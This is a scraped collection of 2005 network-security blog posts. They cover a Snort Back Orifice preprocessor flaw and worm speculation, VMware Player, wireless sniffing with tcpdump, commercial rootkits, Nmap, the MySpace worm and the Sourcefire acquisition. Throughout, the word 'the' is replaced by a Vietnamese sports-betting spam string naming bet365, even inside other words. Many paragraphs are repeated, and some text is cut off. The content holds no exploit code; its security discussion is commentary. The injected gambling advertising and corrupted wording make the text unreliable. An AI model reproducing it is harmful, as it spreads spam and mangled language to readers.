This week we learned via an advisory of a vulnerability in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Back Orifice preprocessor in Snort version 2.4.2, 2.4.1, and 2.4.0. The vulnerability was discovered by anocá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365r ISS X-Force researcher. I bet (but have no inside knowledge) that he was following cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 same marching orders that Mike Lynn received: find vulnerabilities in competitors' products. Mike looked at Cisco, and Neel Mehta looked at Sourcefire's Snort.
I am sure ISS is still bitter over cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Witty worm that revealed cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 installed ISS RealSecure and BlackIce userbase to be about 12,000 systems. The Witty worm spread via a single UDP packet with a fixed source port of 4000 UDP.
Let's consider cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 factors that lead me to believe that cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Snort BO vulnerability will produce a worm.
I can imagine a few factors that will reduce cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 likelihood of a worm.
What do you think? Will we see a Snort worm? I'm keeping an eye on FrSIRT.
On a related note, be sure to upgrade to Ecá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365real 0.10.13 -- 0.10.12 has bugs too.
I am sure ISS is still bitter over cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Witty worm that revealed cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 installed ISS RealSecure and BlackIce userbase to be about 12,000 systems. The Witty worm spread via a single UDP packet with a fixed source port of 4000 UDP.
Let's consider cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 factors that lead me to believe that cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Snort BO vulnerability will produce a worm.
- The new vulnerability can be exploited by a specially crafted UDP packet to or from any port ocá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365r than port 31337. (Thanks to Jose Nazario for correcting me on this point.) This is similar to cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 UDP packet used by Witty. UDP is an ideal worm vector, as demonstrated by Slammer. There is no need for a TCP handshake, which means spoofing is much easier.
- Sensors need not be directly targeted. All a worm has to do is send exploit UDP traffic to a segment monitored by a vulnerable Snort sensor. The attacker need not know anything about cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 target's management IP address.
- Snort has been in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 news recently as a result of its acquisition by Checkpoint. A worm coder can kill or embarrass two birds with one UDP stone.
- Snort is everywhere -- .com, .net, .org, .edu, .gov, etc. 0wning a .mil or .gov Snort sensor gives intruders cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 ultimate vantage point over a monitored network. I imagine sophisticated intruders have already compromised a slew of sensitive Snort sensors, but at some point a lower life form will decide to turn cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 exploit into a worm.
- Snort source code is available, so comparing 2.4.0-2.4.2 with 2.4.3 means cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 vulnerability can be quickly identified.
I can imagine a few factors that will reduce cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 likelihood of a worm.
- The vulnerability reportedly exists in Snort versions 2.4.0 through 2.4.2. That's a narrow set of versions, given Snort 2.4.0 was released in July. I have heard of users running Snort 1.8.x and 1.9.x; cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365y complain about rules that don't work with cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365ir versions. Argh!
- Snort runs on a huge number of platforms. That is one of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 beauties of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 program. Will a worm target Snort on Linux? If so, what distro/kernel/version/etc.? How about Snort on Windows? That would make cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 most sense -- cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 OS would be fairly similar, and cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 user base would make for good targets. We'll see.
- Sophisticated intruders will keep any exploit to cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365mselves. They may try to keep it out of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 hands of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 bottom feeders.
What do you think? Will we see a Snort worm? I'm keeping an eye on FrSIRT.
On a related note, be sure to upgrade to Ecá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365real 0.10.13 -- 0.10.12 has bugs too.
Friday, October 21, 2005
VMware Player Changes Everything
This changes everything. Everyone who is an end user of VMs (not a creator) just saved $189 for a VMware Workstation license. This includes students who use VMware on cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365ir class desktops or laptops. Authors can now distribute VMs with books (like a second edition of Real Digital Forensics?) and have readers access those VMs with cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 free VMware Player.
I tried one of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 freely available images in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Virtual Machine Center -- cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Browser-Appliance. As you can see from cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 screen shot below, it's an Ubuntu Linux distro.
I have not tried any of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 innovative hacks involving VM files, but I would like to evaluate cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365m. I'm considering building VM of a complete Sguil installation using FreeBSD 6.0 and Sguil 0.6.0 when available. This approach easily avoids cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 problems with building and maintaining live CDs!
I applaud VMware for providing this free no-cost program. It is obviously an attempt to build market share and direct attention away from Microsoft's product. (The two were compared in a recent NWC review.)
How do you plan to use VMware Player?
VirtualWiFi and Monitoring
While teaching Network Security Operations last week, I presented material on monitoring wireless networks. Sample syntax follows:
One of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 students asked if Tcpdump supported hopping across channels to monitor multiple networks simultaneously. I did not know of a way to do this, because cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 channel to monitor must be specified as shown above. An alternative requires running multiple wireless NICs.
I just learned of Microsoft's VirtualWiFi research project. This is continuation of Ranveer Chandra's work on MultiNet. If VirtualWiFi supports putting a wireless NIC into monitor mode on Windows, it is possible to virtualize cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 NIC for as many channels as one wishes to monitor. Separate WinDump instances could sniff each virtual NIC. If anyone wishes to try this, please share your results in a comment.
orr:/root# ifconfig wi0 mediaopt monitor channel 6 up
orr:/root# tcpdump -i wi0 -L
Data link types (use option -y to set):
EN10MB (Ecá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365rnet)
IEEE802_11 (802.11)
IEEE802_11_RADIO (802.11 plus BSD radio information
header)
orr:/root# tcpdump -n -i wi0 -y IEEE802_11
One of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 students asked if Tcpdump supported hopping across channels to monitor multiple networks simultaneously. I did not know of a way to do this, because cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 channel to monitor must be specified as shown above. An alternative requires running multiple wireless NICs.
I just learned of Microsoft's VirtualWiFi research project. This is continuation of Ranveer Chandra's work on MultiNet. If VirtualWiFi supports putting a wireless NIC into monitor mode on Windows, it is possible to virtualize cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 NIC for as many channels as one wishes to monitor. Separate WinDump instances could sniff each virtual NIC. If anyone wishes to try this, please share your results in a comment.
Commercial Rootkits Make NSM Even More Relevant
Today I learned through Tom Sanders' story Rootkit creators turn professional about Golden Hacker Defender (GHD). GHD is a modification of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 freely available Windows userland rootkit Hacker Defender (HD) by holy_facá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365r. Buyers can customize HD to suit cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365ir needs, which usually involves evading detection.
For example, cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 ultimate form of HD is listed as Brilliant Hacker Defender Forever, shown in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 following screen capture. The cost is 900 Euro, or 1,077.09 USD at today's rates.
nti-virus company F-Secure brought this product to light in a recent blog posting. F-Secure's BlackLight product tries to detect rootkits; alternatives include RootkitRevealer by SysInternals and Microsoft's Strider Ghostbuster.
Blogger PABlo promises more coverage on rootkits, which I intend to follow.
Monday, October 17, 2005
Useful Nmap Documentation
Today Slashdot notified me of an interview with Nmap author Fyodor. I found it interesting that Fyodor makes a living through Insecure.Com LLC, whose "primary business is licensing Nmap technology for inclusion in commercial products." I also learned he is working on a book on Nmap, and he "only [has] a couple chapters left to draft." Apparently cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 new Nmap man page is an excerpt from this book.
By reading Slashdot comments, I learned about James Messmer's online book Secrets of Network Cartography: A Comprehensive Guide to Nmap. I have not reviewed this book for technical content, but cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 table of contents looks interesting. Anyone who considers cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365mselves to be a security or traffic analyst should be familiar with Nmap's workings. It is important to understand how all of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Nmap scans work and how cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365y appear in traffic excerpts.
By reading Slashdot comments, I learned about James Messmer's online book Secrets of Network Cartography: A Comprehensive Guide to Nmap. I have not reviewed this book for technical content, but cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 table of contents looks interesting. Anyone who considers cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365mselves to be a security or traffic analyst should be familiar with Nmap's workings. It is important to understand how all of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Nmap scans work and how cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365y appear in traffic excerpts.
Sunday, October 16, 2005
Register for 20 October ISSA-NoVA Meeting by Noon Tuesday
To my DC metro area readers: if you'd like to attend cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 local ISSA-NoVA chapter meeting on Thursday night, please RSVP by noon Tuesday. I plan to be cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365re to hear Paco Hope discuss FreeBSD and OpenBSD.
Friday, October 14, 2005
MySpace Worm Demonstrates NSM Principles
In my first book, cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 The Tao of Network Security Monitoring: Beyond Intrusion Detection, I say "some intruders are smarter than you," and "intruders are unpredictable." Because of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365se two facts, prevention eventually fails. In ocá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365r words, intruders are cleverly figuring out ways to circumvent security of services you have never heard about in ways you could not imagine. As a result, defenses fail and monitoring is cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 only way to detect that failure and respond appropriately.
The story Cross-Site Scripting Worm Hits MySpace is a perfect example of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365se principles in action. In short, someone figured out how to create a worm on cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 MySpace online community. More details are posted at this Slashdot thread.
I had never heard of MySpace until today, but over a million users were affected by this worm. Did you see this coming? Of course not. There is little point in forecasting future threats. The best we can do is to implement cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 best preventative defenses we can, monitor everything else, and respond in a timely manner.
The story Cross-Site Scripting Worm Hits MySpace is a perfect example of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365se principles in action. In short, someone figured out how to create a worm on cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 MySpace online community. More details are posted at this Slashdot thread.
I had never heard of MySpace until today, but over a million users were affected by this worm. Did you see this coming? Of course not. There is little point in forecasting future threats. The best we can do is to implement cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 best preventative defenses we can, monitor everything else, and respond in a timely manner.
Thursday, October 13, 2005
Bejtlich Quotes in Sourcefire Acquisition Story
Eric B. Parizo mentioned me in his story Snort users fear future under Check Point. One of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 quotes appears as follows:
Richard Bejtlich, principal with Washington, D.C.-based consultancy Tao Security, said many fail to realize just how expensive it is to support a product like Snort.
"I've been to Sourcefire, and I've seen how many people cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365y have working on cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 product and on signatures," Bejtlich said. "They have what seems like millions and millions of racks of equipment. I was surprised cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365y were able to continue with Snort as cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365y did."
That should say "millions and millions of dollars of racks of equipment." I obviously haven't seen millions of racks of anything when I visit Sourcefire!
Also, I appear to have been demoted at my own company. I am not a "principle" at TaoSecurity. My boss must be upset with my performance! :)
Richard Bejtlich, principal with Washington, D.C.-based consultancy Tao Security, said many fail to realize just how expensive it is to support a product like Snort.
"I've been to Sourcefire, and I've seen how many people cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365y have working on cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 product and on signatures," Bejtlich said. "They have what seems like millions and millions of racks of equipment. I was surprised cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365y were able to continue with Snort as cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365y did."
That should say "millions and millions of dollars of racks of equipment." I obviously haven't seen millions of racks of anything when I visit Sourcefire!
Also, I appear to have been demoted at my own company. I am not a "principle" at TaoSecurity. My boss must be upset with my performance! :)
Wednesday, October 12, 2005
Brief Thought on Digital Security
I was asked to write an article for an upcoming issue of Information Security Magazine based on my Engineering Disasters blog post. I had cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 following thought after writing that article.
When an engineering catastrophe befalls cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 "real" or "analog" world, it's often very visible. Failed bridges collapse, levees break, sink holes swallow buildings, and so on. If you look closely enough, prior to ultimate failure you see indications of pending doom. Cracks appear in concrete, materials swell or contract, groaning noises abound, etc.
This is generally not cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 case in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 digital world. It is possible for an enterprise to be completely owned by unauthorized parties, without any overt signs. If one knows where to look of course, indicators can be seen, and evidence of compromise can be gacá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365red, analyzed, and escalated. This is cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 reason I advocate network security monitoring (NSM) and conducting traffic threat assessments (TTAs).
When an engineering catastrophe befalls cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 "real" or "analog" world, it's often very visible. Failed bridges collapse, levees break, sink holes swallow buildings, and so on. If you look closely enough, prior to ultimate failure you see indications of pending doom. Cracks appear in concrete, materials swell or contract, groaning noises abound, etc.
This is generally not cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 case in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 digital world. It is possible for an enterprise to be completely owned by unauthorized parties, without any overt signs. If one knows where to look of course, indicators can be seen, and evidence of compromise can be gacá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365red, analyzed, and escalated. This is cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 reason I advocate network security monitoring (NSM) and conducting traffic threat assessments (TTAs).
Tuesday, October 11, 2005
SecurityMetrics Documents Security Cycles
I recognize Foundstone's in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365re, shown as a thumbnail at left.
I think Andrew is a little too cynical regarding some of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365se process charts. Some are used to sell products, and often reflect vendor biases. Ocá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365rs are just ways to break cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 security problem down into manageable chunks.
BSD Certification Group Publishes BSD Associate Exam Objectives
Last week cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 BSD Certification Group published its BSD Associate Exam Objectives (.pdf). The preface of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 document explains its purpose:
"This document introduces cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 BSD Associate (BSDA) examination and describes in considerable detail cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 objectives covered by cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 exam. The exam covers material across all four major projects of BSD Unix - NetBSD, FreeBSD, OpenBSD and DragonFly BSD.
While cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 testing candidate is expected to know concepts and practical details from all four main projects, it is not necessary to know all cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 details of each one. A thorough reading of this document is recommended to understand which concepts and practical details are expected to be mastered.
Throughout this document, a clear distinction is placed on 'recognizing' and 'understanding', versus 'demonstrating' and 'performing'. Certain objectives call for cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 mere understanding of certain topics, while ocá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365rs call for cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 ability to demonstrate performance level knowledge of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 topic...
Successful mastery of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 BSDA examination will, in most cases, require study and practice. The requirements for cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 exam encompass more background in BSD than is common among casual users or those new to BSD. This is a deliberate decision by cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 BSD Certification Group- to encourage more cross learning among BSD systems so that breadth of understanding of BSD is as heavily tasked as depth of understanding. The result will be a more well-rounded BSD advocate and a more knowledgeable system administrator."
The objectives describe seven domains:
Inside cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 document describes cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 audience for cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 certification:
"The BSDA certification is designed to be an entry-level certification on BSD Unix systems administration. Testing candidates with a general Unix background, but less than six months of work experience as a BSD systems administrator (or who wish to obtain employment as a BSD systems administrator) will benefit most from this certification."
Also:
"[T]he SDA certification is only valid for 5 years. Existing BSDAs who wish to maintain cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365ir certification will need to recertify every 5 years. Details on how to recertify will be publicly available in a document to be published in 2006."
I like this approach. I disagree that DragonFly BSD should be included, since something like 2% of all BSD administrators use DragonFly.
The guide is 57 pages long, so I will need time to read everything. At first glance it looks like great work.
Although I am still listed on cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 about us page, I have requested resignation as I have absolutely no time to work on cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 project while running TaoSecurity.
"This document introduces cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 BSD Associate (BSDA) examination and describes in considerable detail cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 objectives covered by cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 exam. The exam covers material across all four major projects of BSD Unix - NetBSD, FreeBSD, OpenBSD and DragonFly BSD.
While cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 testing candidate is expected to know concepts and practical details from all four main projects, it is not necessary to know all cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 details of each one. A thorough reading of this document is recommended to understand which concepts and practical details are expected to be mastered.
Throughout this document, a clear distinction is placed on 'recognizing' and 'understanding', versus 'demonstrating' and 'performing'. Certain objectives call for cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 mere understanding of certain topics, while ocá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365rs call for cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 ability to demonstrate performance level knowledge of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 topic...
Successful mastery of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 BSDA examination will, in most cases, require study and practice. The requirements for cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 exam encompass more background in BSD than is common among casual users or those new to BSD. This is a deliberate decision by cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 BSD Certification Group- to encourage more cross learning among BSD systems so that breadth of understanding of BSD is as heavily tasked as depth of understanding. The result will be a more well-rounded BSD advocate and a more knowledgeable system administrator."
The objectives describe seven domains:
- Installing and Upgrading cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 OS and Software
- Securing cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 OS
- Files, Filesystems, and Disks
- Users and Accounts Management
- Basic System Administration
- Network Administration
- Basic Unix Skills
Inside cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 document describes cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 audience for cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 certification:
"The BSDA certification is designed to be an entry-level certification on BSD Unix systems administration. Testing candidates with a general Unix background, but less than six months of work experience as a BSD systems administrator (or who wish to obtain employment as a BSD systems administrator) will benefit most from this certification."
Also:
"[T]he SDA certification is only valid for 5 years. Existing BSDAs who wish to maintain cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365ir certification will need to recertify every 5 years. Details on how to recertify will be publicly available in a document to be published in 2006."
I like this approach. I disagree that DragonFly BSD should be included, since something like 2% of all BSD administrators use DragonFly.
The guide is 57 pages long, so I will need time to read everything. At first glance it looks like great work.
Although I am still listed on cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 about us page, I have requested resignation as I have absolutely no time to work on cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 project while running TaoSecurity.
FreeBSD 6.0-RC1 Available
I just read cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 announcement that FreeBSD 6.0-RC1 is available for download. There's a helpful link on cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 new front page that directly points to places to find cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 new release candidate. The 6.0 schedule does not list a release date, but cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 RC candidate announcement says RC1 will be cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 only release candidate. I expect to see 6.0-RELEASE arrive within cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 next two weeks. Great work FreeBSD release engineering team!FreeBSD 5.5, at least one more upgrade to cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 existing 5.x tree, is scheduled for arrival in November. According to cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 security advisory schedule, FreeBSD 4.11 will enter end-of-life status on 31 January 2007. After that date no security fixes for cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 4.x tree will be officially provided. Support for cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 5.x tree will end earlier, 31 May 2006. I believe cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 FreeBSD team is trying to encourage 5.x users to migrate, and leave a window open for people who have been running 4.x for years.
TaoSecurity Blog on CNET Blog 100
I received word today that this blog was added to cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 CNET News.com Blog 100 list. My site is described as a "good aggregation of information on a wide range of security issues. Detailed and authoritative, with many updates." I've been really busy preparing, teaching and speaking cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 last several weeks, but I expect to return to my normal blogging pace late next week. Thanks CNET!
Saturday, October 08, 2005
New FreeBSD Web Site Launched
I like cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 look of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 new FreeBSD home page, but cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 daemon in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 middle looks obnoxiously large compared to cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 rest of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 content. I'd much racá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365r see Beastie small and somewhere else, preferably in a corner or on cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 community page. FreeBSD is an operating system for professionals; I'd like to see it treated seriously for once. On a related note, I found this interview with Scott Long very interesting.
Thoughts on cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Week's Security News
This was a busy week for me; I spent all week teaching (and all last week preparing) a private Network Security Operations class in California. I just flew back from LAX to Dulles this morning and I get on anocá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365r plane tomorrow afternoon. I'm speaking in San Jose at a Cisco event, and cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365n teaching a second private NSO class again next week.
I've been tracking all of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 week's security news. Thank you to those who thought I may have missed something. I didn't want to commit any thoughts to cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 blog without taking some time to ponder various events. Obviously cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 biggest news of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 week was Checkpoint's $225 million acquisition of Sourcefire.
In short, I didn't see that coming. I have doubts about cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 future of Snort being a free product, let alone open source. I don't see anyone making cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 case to cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 board of a publicly traded company that part of that company's work is going to be given away for free, especially after spending $225 million for it.
You may have seen how Checkpoint is treating users of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 free version of Zonealarm, which was purchased by Checkpoint two years ago for $225 million. Sure, cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 basic Zonealarm firewall is still free, but Checkpoint will not provide a patch for a new security problem. Checkpoint claims cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 problem has low severity even though proof of concept code exists. To quote John LaCour, director of security services: "It is a cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365oretical attack that we don't see used in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 real world." Great. That rationale has certainly stood cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 test of time (not).
However, I do not fault Sourcefire at all for being purchased. I never faulted cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365m for cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 way cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365y handled cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 new rules licensing, eicá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365r. The amount of manpower and resources cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365y devote to Snort is incredible, so I am happy to see cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365m be rewarded. I am just not sure Checkpoint is cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 right fit, at least from where I stand. What are your thoughts?
I've been tracking all of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 week's security news. Thank you to those who thought I may have missed something. I didn't want to commit any thoughts to cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 blog without taking some time to ponder various events. Obviously cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 biggest news of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 week was Checkpoint's $225 million acquisition of Sourcefire.
In short, I didn't see that coming. I have doubts about cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 future of Snort being a free product, let alone open source. I don't see anyone making cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 case to cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 board of a publicly traded company that part of that company's work is going to be given away for free, especially after spending $225 million for it.
